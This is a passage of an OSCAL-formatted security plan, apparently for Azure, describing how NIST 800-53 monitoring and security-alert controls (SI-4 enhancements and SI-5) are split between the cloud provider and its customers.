In addition to standard logging and monitoring via asset logs described in the AU family, Azure performs network monitoring and detection of unauthorized connections via Network Isolation (NetIso), which provides the Network Risk Management Service (NRMS) for network baseline measurement, management, and enforcement. The service provides an assessment of network security and alerts on internet-exposed endpoints via Incident Management (IcM) based on analysis patterns for configuration issues. Any process that begins offering an open network port is flagged and investigated if it is not part of the approved baseline for that host to ensure detection of network services that have not been authorized as an indicator of compromise. Azure filters network traffic to Azure subscriptions at the Management Group Level. All traffic not allowed by the relevant Network Baselines will be blocked, regardless of Network Security Group (NSG) configuration within Azure Subscriptions. Traffic is effectively filtered at each level of the resource stack. 
In order for network traffic to get to an asset, it needs to be allowed by all of the levels of security rules."}],"responsibilities":[{"uuid":"362ba128-4567-42a6-813c-3f07ce4a547c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-030"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for monitoring customer-deployed resources, including the monitoring of inbound and outbound communications traffic at the customer-defined frequency for unusual or unauthorized activities/conditions.","provided-uuid":"e7db36e1-512f-4912-8857-61f39a48c4c1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"4cb2440f-35a1-4164-954b-925f660058fd","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.5","statements":[{"uuid":"ab851943-e0b4-4d4e-bcdc-cac6ea5af930","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-031"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.5_smt","by-components":[{"uuid":"ca9129f7-b986-41ea-98c3-c737980ea6d1","export":{"provided":[{"uuid":"158f77bd-d8a0-46b7-9fd2-b7c5d50a06d1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-031"}],"description":"Due to the size and complexity of the Azure environment, Azure utilizes event forwarding and monitoring tools to record events across Azure and correlate the events gathered by each logging tool. 
Log review cannot be conducted manually in the Azure environment due to the high volume of events. Instead, Azure implements automated methods to perform review, analysis, and reporting of logs. Azure Security Monitoring (ASM) and Scuba are used to do direct alerting using Incident Management (IcM) tickets on security-relevant events. These tools utilize event audit policies and detections that report events to the Security Response Team and service teams as appropriate. Once processed, the Security Response Team reviews and analyzes alerts generated by the automated review of audit records in real time. Events that meet a pattern of a known attack methodology are delivered to the appropriate service teams via IcM or email. These teams review and analyze the activities detailed in the alerts in accordance with Troubleshooting Guides (TSGs) attached to the ticketed alert. The alerting system provides 24/7 response capability."}],"responsibilities":[{"uuid":"cdcd9668-8208-46f6-91a4-7bdb59025278","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-031"}],"description":"The customer is responsible for providing monitoring alerts for customer-deployed resources to customer-defined personnel or roles when specified indications of compromise or potential compromise occur.","provided-uuid":"158f77bd-d8a0-46b7-9fd2-b7c5d50a06d1"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b1d0da87-73cf-40d7-a822-09d3c686bf22","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.10","statements":[{"uuid":"4df9be01-7c2c-4a8a-a1dc-4988a620ae71","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-032"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.10_smt","by-components":[{"uuid":"c628dc42-e53c-4326-b510-48502782bf0a","export":{"provided":[{"uuid":"ffefa3e3-8b40-49ce-8a30-7ac10e1565bb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-032"}],"description":"For Azure services, onboarding to Azure Security Pack (AzSecPack) enables monitoring of network communication correlated with network logs and in-memory lateral movement during post exploitation for all deployment types via Process Investigation, which is available externally via Microsoft Defender for Cloud via Fileless Attack detections, and via the Network Risk Management (NRM) Service. The NRM service assesses the resultant set of open ports and protocols based on data provided by the VM agent. Additionally, for VMs hosted on Azure, the Network Security Group (NSG) settings are considered and the resultant set of the settings is calculated. Additionally, for the assets running in Bare Metal, Azure assesses the Surface Area Manager configuration settings. For Linux VMs hosted in Azure, Azure uses the NSG settings to validate that the configuration meets the network baseline requirements. 
For all deployment types, if there is a network baseline violation that exposes a management port to the internet, an alert is generated and routed to the service team. For internal service teams, Azure implements monitoring and alerting for unusual behavior of key security features including, but not limited to, if a user accesses an asset without using Azure Just In Time (JIT) access, if a dSTS account has an unusual access pattern, if the Geneva Actions have unusual activity, if the Azure Fabric is accessed without using Azure JIT, or if a service owner has unexpected changes to permissions in the service team subscription. Additionally, internal services regardless of deployment type monitor their own network connections for unexpected network activities at the application layer. However, to protect customer end user identifiable information, Azure does not monitor the customer traffic in the security monitoring solutions."}],"responsibilities":[{"uuid":"5783d4f7-427b-4db6-a406-e7ba9a6f95c2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-032"}],"description":"The customer is responsible for making provisions so that customer-defined encrypted communications traffic is visible to information system monitoring tools.","provided-uuid":"ffefa3e3-8b40-49ce-8a30-7ac10e1565bb"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2201ab24-c217-49b8-9096-feec02895d49","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.11","statements":[{"uuid":"c5754dd8-a4bc-4b06-a9a2-2e80ccb190ee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-033"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"si-4.11_smt","by-components":[{"uuid":"b552e208-d7f9-4841-8d10-87fce68e7778","export":{"provided":[{"uuid":"0d7d3332-bb06-4d49-837a-259a52cb08c9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-033"}],"description":"For Azure services, onboarding to Azure Security Pack enables monitoring of network communication correlated with network logs and in-memory lateral movement during post exploitation for all deployment types via Process Investigation, which is available externally via Azure Security Center via Fileless Attack detections, and via the Network Risk Management (NRM) Service. The NRM service assesses the resultant set of open ports and protocols based on data provided by the VM agent. Additionally, for VMs hosted on Azure, the Network Security Group (NSG) settings are considered and the resultant set of the settings is calculated. Additionally, for the assets running in Bare Metal, Azure assesses the Surface Area Manager configuration settings. For Linux VMs hosted in Azure, Azure uses the NSG settings to validate that the configuration meets the network baseline requirements. 
For all deployment types, if there is a network baseline violation that exposes a management port to the internet, an alert is generated and routed to the service team. For internal service teams, Azure implements monitoring and alerting for unusual behavior of key security features including, but not limited to, if a user accesses an asset without using Azure Just In Time (JIT) access, if a dSTS account has an unusual access pattern, if the Geneva Actions have unusual activity, if the Azure Fabric is accessed without using Azure JIT, or if a service owner has unexpected changes to permissions in the service team subscription. Additionally, internal services regardless of deployment type monitor their own network connections for unexpected network activities at the application layer. However, to protect customer end user identifiable information, Azure does not monitor the customer traffic in the security monitoring solutions."}],"responsibilities":[{"uuid":"5ba81437-b0de-46f3-8e20-9184a65787df","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-033"}],"description":"The customer is responsible for analyzing communications traffic anomalies for customer-deployed resources, including an analysis of outbound communications traffic at the external boundary and at customer-defined interior points within the system to discover anomalies.","provided-uuid":"0d7d3332-bb06-4d49-837a-259a52cb08c9"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ae2e74c5-205d-445a-a1de-2e8814d735c6","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.12","statements":[{"uuid":"e3d41eb4-144d-41ec-ac7b-9b48a66f164a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-034"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.12_smt","by-components":[{"uuid":"712f92a1-9f69-4792-a393-ef438b1f0f5e","export":{"provided":[{"uuid":"608d9ed0-83ae-46c8-b608-2c538ba1871e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-034"}],"description":"When Azure Security receives notification of inappropriate or unusual activities, they alert appropriate personnel using automated mechanisms such as Azure DevOps, Incident Management (IcM), Service 360 (S360), and email."}],"responsibilities":[{"uuid":"86cafcc4-ddbd-4262-8e17-ed70aee0017d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-034"}],"description":"The customer is responsible for alerting security personnel using automated mechanisms when customer-defined inappropriate or unusual activities with security and privacy implications occur.","provided-uuid":"608d9ed0-83ae-46c8-b608-2c538ba1871e"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"abfb2e3b-b71e-4a42-a219-00cb2b50af64","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.14","statements":[{"uuid":"f5d417cd-a17a-411f-abc0-98c775f8b43d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-035"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.14_smt","by-components":[{"uuid":"3a8091e3-ad88-401c-a03d-f5acf07bbce5","export":{"provided":[{"uuid":"57784092-3af8-45c4-81c9-679e73a47219","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-035"}],"description":"Wireless access is not permitted within the Azure environment. Azure regularly scans for rogue wireless signals at least quarterly within the Azure datacenters. Results are logged and documented by the Azure Security Response Team. Any rogue signals are investigated and removed. The involvement of the Azure Security Response Team will initiate the processes outlined on the IR control family section of this SSP. 
Refer to that IR control family section to identify incident response processes and procedures."}],"responsibilities":[{"uuid":"2e8fa9a7-760b-4220-9395-d955c3a7ad02","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-035"}],"description":"The customer is responsible for employing a wireless intrusion detection system to identify rogue wireless devices and to detect attack attempts and potential compromises or breaches to customer managed resources.","provided-uuid":"57784092-3af8-45c4-81c9-679e73a47219"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"19d279db-e4e9-43ce-85b4-f243b2de7346","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.16","statements":[{"uuid":"89326254-c00c-4ad3-b29d-59ef18fe1380","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-036"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.16_smt","by-components":[{"uuid":"86af2bd4-2de0-4ff9-9627-72d3feb62036","export":{"provided":[{"uuid":"6fc19620-0bf6-42b0-ab15-20fee3908891","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-036"}],"description":"All Azure assets upload logs to Geneva Monitoring for aggregation and analysis. 
Reports are generated from this data and cover system-wide intrusion detections."}],"responsibilities":[{"uuid":"fbfa170c-657a-4635-8562-f36c415a8030","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-036"}],"description":"The customer is responsible for correlating monitoring information.","provided-uuid":"6fc19620-0bf6-42b0-ab15-20fee3908891"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7a96939e-7fa1-4ed6-90f4-336df32f1a8f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.18","statements":[{"uuid":"e8bb6626-395f-4c2b-aa7f-db3ea1e13c5d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-037"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"si-4.18_smt","by-components":[{"uuid":"dd363ab1-a059-43d4-9ba6-378427297685","export":{"provided":[{"uuid":"9ca060be-5616-4362-99fa-3892a5963a85","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-037"}],"description":"For Azure services, onboarding to Azure Security Pack enables monitoring of network communication correlated with network logs and in-memory lateral movement during post exploitation for all deployment types via Process Investigation, which is available externally through the Fileless Attack detections in Azure Security Center, and via the Network Risk Management (NRM) Service. The NRM service assesses the resultant set of open ports and protocols based on data provided by the VM agent. 
Additionally, for VMs hosted on Azure, the Network Security Group (NSG) settings are considered and the resultant set of settings is calculated. For assets running on Bare Metal, Azure assesses the Surface Area Manager configuration settings. For Linux VMs hosted in Azure, Azure uses the NSG settings to validate that the configuration meets the network baseline requirements. For all deployment types, if there is a network baseline violation that exposes a management port to the internet, an alert is generated and routed to the service team.\n\nFor internal service teams, Azure implements monitoring and alerting for unusual behavior of key security features, including, but not limited to, a user accessing an asset without using Azure Just In Time (JIT) access, a dSTS account with an unusual access pattern, unusual Geneva Actions activity, the Azure Fabric being accessed without Azure JIT, or unexpected changes to a service owner's permissions in the service team subscription.\n\nAdditionally, internal services, regardless of deployment type, monitor their own network connections for unexpected network activity at the application layer. 
However, to protect customer end-user identifiable information, Azure does not monitor customer traffic in its security monitoring solutions."}],"responsibilities":[{"uuid":"9e6ec3d1-5484-4961-920a-57a7ee266bcb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-037"}],"description":"The customer is responsible for analyzing communications traffic for customer-deployed resources, including an analysis of outbound communications traffic at the external boundary and at customer-defined interior points within the system to detect covert exfiltration of information.","provided-uuid":"9ca060be-5616-4362-99fa-3892a5963a85"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a0353c3f-6a81-46c3-8cad-99ba65116042","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.19","statements":[{"uuid":"45daa2ee-6bdc-4e86-82fb-1d41ec5c4cfc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-038"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.19_smt","by-components":[{"uuid":"e71a274d-62c4-4503-bc23-4969264359b5","export":{"provided":[{"uuid":"61801dc2-703e-4b10-8bff-bced07a02db5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-038"}],"description":"In the case where Azure identifies an individual as posing an increased level of risk, that individual's access is revoked. 
The Security Response Team takes special interest in data generated by existing monitoring solutions to identify any malicious actions the individual may attempt. The Security Response Team responds to requests by HR and engineering groups to take emergency action on high-risk accounts, such as emergency account disablement. The Security Response Team also maintains auditable events of account activity that can be used in Security Response Team investigations."}],"responsibilities":[{"uuid":"a136f111-ef06-4d67-b2c1-6b0e04d8e01d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-038"}],"description":"The customer is responsible for monitoring individuals who pose a greater risk.","provided-uuid":"61801dc2-703e-4b10-8bff-bced07a02db5"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"04867058-09ff-40ff-a80f-5e00fd57a699","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.20","statements":[{"uuid":"ec91c5f4-1b2e-4647-9ee8-5b24ab1d2e33","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-039"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.20_smt","by-components":[{"uuid":"406df4f7-039a-4c5b-a7a4-83eec364426a","export":{"provided":[{"uuid":"fa5920ad-7c79-4d9b-844c-8d3bd6b1d5bc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-039"}],"description":"The Security Response Team uses all logs and tools to monitor personnel as 
necessary. In addition to the auditable event activity, custom alerts are generated for specific elevated-access user accounts such as local administrators. The alerts are investigated by the Security Response Team in accordance with the incident management procedures."}],"responsibilities":[{"uuid":"787b121f-3a66-4130-a6e2-3936a7434bfa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-039"}],"description":"The customer is responsible for monitoring privileged users.","provided-uuid":"fa5920ad-7c79-4d9b-844c-8d3bd6b1d5bc"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"dc35660a-a88b-44ab-a7ff-476d1dae6259","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.22","statements":[{"uuid":"91a54fa3-db0e-470a-9d22-4f4c4547f82c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-040"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.22_smt","by-components":[{"uuid":"b0648ecc-696d-4fde-8c50-d8bf76784e3f","export":{"provided":[{"uuid":"92875ad1-475b-453b-99cc-b2cc0ba8783b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-040"}],"description":"Azure detects network services that have not been authorized or approved by the Azure Change and Release Management process. If an unauthorized network service is discovered, the Azure LiveSite (WALS) team investigates the issue following the incident management process. 
Azure tracks network connections that are opened by the processes running on the host. Any process that begins listening on a network port is flagged and investigated if it is not part of the approved baseline for that host, so that network services that have not been authorized are detected as an indicator of compromise. In addition, the host-based SDN firewall uses a default deny-all policy.\n\nAzure enforces a default deny policy that restricts communication to explicitly permitted firewall zones. For any policy change, a detailed request with justification must be submitted and approved by C+AI Security through the standard security process."}],"responsibilities":[{"uuid":"11678573-1dce-4ef6-aa9f-1b22069cf160","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-040"}],"description":"The customer is responsible for detecting network services that have not been authorized or approved by customer-defined processes, and for auditing or alerting customer-defined personnel or roles.","provided-uuid":"92875ad1-475b-453b-99cc-b2cc0ba8783b"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"988afa0d-cccd-484d-9d9c-3fcf3751dddb","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.23","statements":[{"uuid":"2132719b-e1a6-445e-b4db-688bd8076963","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-041"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.23_smt","by-components":[{"uuid":"2f165def-0f20-4572-9ff6-42d319f54219","export":{"provided":[{"uuid":"fa30c70e-de64-4377-aca4-290b1e5d860f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-041"}],"description":"All hosts within Azure have event logging enabled. If this functionality is turned off or unsuccessful, an alert is generated through Geneva Monitoring and the alert is investigated as a security incident. Assets are each configured with an Event Forwarding Tool. The Event Forwarding Tool sends audit records to the Security Incident and Event Management Tool via an event collection infrastructure which also archives security events within the environment. This event forwarding occurs in real time for the interconnected system. Additionally, anti-virus software is configured to scan incoming files in real time and quarantine them if they are determined to be malicious. Alerts from clients are logged in the anti-virus software database, and alerts for malware-related events are sent in near-real time to the Security Response Team in three ways. 
This happens via alerts/tickets, emails to the Security Response Team, and a feed to the security incident and event management tool.\n\nAzure Security Pack (AzSecPack) enables monitoring of network communication correlated with network logs and in-memory lateral movement during post exploitation for all deployment types via Process Investigation, which is available externally through the Fileless Attack detections in Azure Security Center, and via the Network Risk Management (NRM) Service. AzSecPack is automatically enabled for applicable Azure assets via a centrally managed configuration. Monitoring for missing AzSecPack is implemented by Azure Security Monitoring (ASM)."}],"responsibilities":[{"uuid":"34274732-724f-4c7b-a6ab-8c62f199b297","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-041"}],"description":"The customer is responsible for implementing host-based monitoring for customer-deployed resources.","provided-uuid":"fa30c70e-de64-4377-aca4-290b1e5d860f"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8571842f-0784-4283-b0f9-dfd6d399e7c6","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-5","statements":[{"uuid":"21678a8e-b1ed-4c51-820c-4d0008e7fbda","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-042"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-5_smt.a","by-components":[{"uuid":"7fee43f8-922d-42f4-b9d6-9360f1f6e0ad","export":{"provided":[{"uuid":"6faa7e6f-edfe-49ea-b529-cfb2b491dfa7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-042"}],"description":"For all asset types, Azure receives information system security alerts, advisories, and directives from external vendors, parties providing software within the Azure environment, and external security organizations including US-CERT and other external parties performing independent vulnerability analysis. In addition, customers can report security incidents at any time through the Azure Management Portal or via a dedicated phone line that is available twenty-four (24) hours a day, seven (7) days a week.\n\nInternally, Microsoft's Security Response Team notifies service teams of security incidents and the latest security patches for Microsoft's software platforms. The Microsoft Security Response Center (MSRC) also publishes Security Bulletins and associated patches every month except when MSRC determines that an out-of-band patch is required for addressing zero-day vulnerabilities or escalations. 
Working with MSRC and the Security Response Team, external parties such as regulators, law enforcement, ISPs, and other partners can identify security issues. Service teams also subscribe to service-specific alerts, advisories, and directives as needed.\n\nAzure is also made aware of any directives or advisories through the FedRAMP Program Management Office (PMO), the DISA/DoD authorizing officials, and other authorizing officials, which send email alerts providing situational awareness and any actions that all CSPs must take."}],"responsibilities":[{"uuid":"8172a365-ccb4-4887-ba83-1f7538640262","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-042"}],"description":"The customer is responsible for receiving security alerts, advisories, and directives from customer-defined external organizations on an ongoing basis.","provided-uuid":"6faa7e6f-edfe-49ea-b529-cfb2b491dfa7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"e3327987-bb68-4e73-bd1b-b8f186da5b5c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-043"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-5_smt.b","by-components":[{"uuid":"9ba9ad9c-fcfa-4d9b-9de8-cc0ce78b45bd","export":{"provided":[{"uuid":"ff3726dc-64e1-426e-afa4-814aebdf2d47","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-043"}],"description":"Internally, Microsoft's Security Response Team notifies service teams of security incidents which occur within the physical environment against Azure datacenters and boundary network devices. 
MSRC notifies service teams of the latest security patches for Microsoft's software platforms. MSRC also publishes Security Bulletins and associated patches on the second Tuesday of every month except when MSRC determines that an out-of-band patch is required for addressing zero-day vulnerabilities or escalations."}],"responsibilities":[{"uuid":"910cd451-83e0-482b-92e2-29257bd282a4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-043"}],"description":"The customer is responsible for generating internal security alerts, advisories, and directives as deemed necessary.","provided-uuid":"ff3726dc-64e1-426e-afa4-814aebdf2d47"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"80025d31-d148-4a68-aa6c-604b52db9bca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-044"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-5_smt.c","by-components":[{"uuid":"d709bf10-3516-47e4-abc6-0413206f5e19","export":{"provided":[{"uuid":"3051a11b-3f25-4764-95b7-33066dd3c14f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-044"}],"description":"Azure disseminates alerts received from vendors and other third-party services such as IBM Internet Security Systems and US-CERT and shares this information throughout the organization. Additionally, Microsoft publishes bulletins through the Microsoft Security Response Center (MSRC) which include specific information relevant to security updates being released. 
The Azure Security team also addresses notifications and disseminates security alerts via email and RSS feeds received directly from external organizations other than the Services Operation Center or Microsoft Support.\n\nServers\n\nThe Vulnerability Management team conducts a monthly conference call with Azure stakeholders to review updates that are required in the environment, based on the data provided in the Advance Notification Service by the MSRC. Minutes from this call are recorded and saved for historical understanding of the rationale used to determine which updates were required in the past.\n\nNetwork Devices\n\nFor network devices, hardware vendors make Azure Networking aware of security vulnerabilities on their products via e-mail. Azure Networking logs the email into the ticketing system and performs analysis to evaluate possible risks and mitigations. Azure Networking has dedicated support engineers from the major hardware vendors, including, but not limited to, Cisco, Juniper, and F5, that assist with the analysis and determination of the course of action. 
